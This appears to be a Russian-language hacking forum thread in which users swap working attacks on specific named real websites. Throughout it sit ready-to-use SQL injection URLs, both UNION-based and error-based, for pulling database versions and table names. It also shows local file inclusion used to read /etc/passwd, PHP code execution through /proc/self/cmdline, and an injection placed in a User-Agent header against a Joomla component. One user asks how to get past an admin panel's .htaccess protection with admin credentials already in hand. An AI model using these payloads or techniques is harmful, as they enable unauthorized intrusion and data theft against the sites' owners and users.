http://wmrace.ru/buy.php?carid=-3'+union+select+1,2,3,4,5,6,7,8,9,10,11--+ Помогите раскрутить, пока что смог - это узнать версию: Code: http://wmrace.ru/buy.php?carid=-3'%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))--+ да, прямого вывода на стр. нету upd: antichat:antichat
http://wmrace.ru/buy.php?carid=3'+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1--+ как error-based крути. upd: http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*),concat((select+concat(table_name,0x00)+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
та не норм, пишет же ошибку что я там неправильно подставил? http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1,table_name,3,4,5,6,7+from+information_schema,tables+and+%28%27DzDB%27=%27DzDB
http://zapoved.ru/?act=docs_more&id=-3%27%29+UNION+SELECT+1,table_name,3,4,5,6,7+from+information_schema.tables%23 что не так? =\
Реебят, а можете мне обьямнить какой толк от такой уязвимости как include(LFI)? ну допустим я смогу просмотреть файл etc/passwd а толк от него?, увижу пути и логины узеров без паролей и всё, может я чегото ещо не знаю, дайте линки почитаю
https://forum.antichat.ru/threadnav12123-1-10.html https://forum.antichat.ru/thread23501.html https://forum.antichat.ru/thread91807.html https://forum.antichat.ru/thread98525.html
почитал, наол много итересного, такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача? просто вручную както тупо. вот дппустим etc/passwd нашол http://zamok-met.ru/catalog.php?id=../../../../etc/passwd а логи не получается мне как тот весь список что тут https://forum.antichat.ru/thread91807.html в ручную переберать? или может есть более умный способ для их поиска? подскажите
ухты, спасиб, но прога немного фуфловатся, ечто что именно касается словаря, ведь допустим путь может быть разный, не только ../../../../etc/passwd а и юольше ../../../../../../etc/passwd и меньше, мне как надо срегеть пути рзный длины и все записывать, получается? или я чегото непонимаю?
Подскажите как использовать эту инъекцию... GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1 User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol http://en.wikipedia.org/wiki/List_of_HTTP_headers Изучай
Выполнение PHP кода: http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&<?php print php_uname();?> Вернет: /bin/apache2___[zamok-met.ru] GET /catalog.php?id=../../../../proc/self/cmdline%00&Linux cabol.beget.ru 2.6.35.14 #4 SMP Sun Aug 14 23:30:33 MSD 2011 x86_64 HTTP/1.0 Запрос отправлять не через браузер, иначе все символы урлкодируются. Руки и голова
На админку стоит дополнительная авторизация .htaccess. Как-нить можно попасть в админ панель? П.С. Все логин, пасс админа есть
Спасибо за ответ, не могли бы ли вы подсказать какой-нибудь удобный инструмент для эксплуатации уязвимости?